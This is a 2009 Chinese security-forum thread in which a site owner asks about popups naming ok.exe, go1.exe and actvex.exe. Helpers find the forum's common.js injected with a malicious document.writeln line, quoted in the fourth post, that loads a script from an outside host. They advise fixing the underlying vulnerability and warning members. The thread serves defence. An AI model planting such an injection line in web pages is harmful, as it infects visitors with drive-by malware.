瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 ok.exe ,go1.exe,actvex.exe.这些是什么病毒

1   1  /  1  页   跳转

[求助] ok.exe ,go1.exe,actvex.exe.这些是什么病毒

收藏
清风明月2008
头像
初生襁褓狮
  • 帖子:9
  • 注册: 2009-01-10
  • 来自:
发表于: 2009-04-17 09:07 | 只看楼主 短消息 资料
字号: 1楼

ok.exe ,go1.exe,actvex.exe.这些是什么病毒

      我的论坛最近不知道被什么病毒侵入,在每次开电脑第一次打开论坛的时候就会出现一个弹窗,阻止打开页面,刷新一下,论坛也可以完全打开!我们开始以为是内部错误,检查了好久都没有发现问题,最近这个软件程序还再不断的演变,



程序字符提示。一开始是以  ok.exe  。昨天是 go1.exe。今天又演变成。actvex.exe.  我再浏览别的网页的时候也发现有的网站也有这个问题,请教各位朋友,这是怎么回事!



我的论坛地址:http://bbs.gddgw.com/



阻止打开的弹窗图片

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; MAXTHON 2.0)
分享到:
gototop
 
清风明月2008
头像
初生襁褓狮
  • 帖子:9
  • 注册: 2009-01-10
  • 来自:
发表于: 2009-04-17 09:17 | 只看楼主 短消息 资料
字号: 2楼

回复:ok.exe ,go1.exe,actvex.exe.这些是什么病毒

顶下!
gototop
 
帅哥阿福
头像
雄霸杖朝狮
  • 帖子:21071
  • 注册: 2006-03-29
  • 来自:米兰
论坛8周年活动礼物祖国六十华诞09欢乐圣诞
发表于: 2009-04-17 09:34 | 短消息 资料
字号: 3楼

回复: ok.exe ,go1.exe,actvex.exe.这些是什么病毒



登陆楼主提供的地址,报上述错误,看来是成为肉鸡了。
╭∩╮(︶︿︶)╭∩╮
gototop
 
左眼球
头像
锋芒艾服狮
  • 帖子:1313
  • 注册: 2008-03-03
  • 来自:左眼眶子里
论坛8周年活动礼物
发表于: 2009-04-17 10:36 | 短消息 资料
字号: 4楼

回复: ok.exe ,go1.exe,actvex.exe.这些是什么病毒

http://bbs.gddgw.com/include/javascript/common.js
该文件被挂马

恶意代码:
document.writeln("<script language=javascript src=http:\/\/www.cb71.cn\/a.js><\/script>")
本帖被评分 1 次
精品软件、实用工具大杂烩(20091221更新到61款)
Windows清理助手
gototop
 
清风明月2008
头像
初生襁褓狮
  • 帖子:9
  • 注册: 2009-01-10
  • 来自:
发表于: 2009-04-17 14:57 | 只看楼主 短消息 资料
字号: 5楼

回复:ok.exe ,go1.exe,actvex.exe.这些是什么病毒

楼上兄弟真是高招,已经完全解决!
gototop
 
左眼球
头像
锋芒艾服狮
  • 帖子:1313
  • 注册: 2008-03-03
  • 来自:左眼眶子里
论坛8周年活动礼物
发表于: 2009-04-17 17:02 | 短消息 资料
字号: 6楼

回复:ok.exe ,go1.exe,actvex.exe.这些是什么病毒

不是去掉代码就可以高枕无忧的了,既然被挂马就肯定是存在漏洞的,比如论坛程序漏洞,服务器漏洞,服务器所在机房存在ARP攻击,同一服务器下的其他网站存在漏洞等等,很多可能性,都是安全隐患

而且刚才过去看的时候似乎没有发现贵站的会员有反应这件事的,如果时用firefox或者chrome浏览器的话,应该很容易看到3楼的那个提示。

除此以外建议你在你的论坛出个公告,提醒一下你的会员,以防那些防护不周的会员已经中毒。毕竟被挂的这一行代码继续跟踪的话能抓到不少网马
精品软件、实用工具大杂烩(20091221更新到61款)
Windows清理助手
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT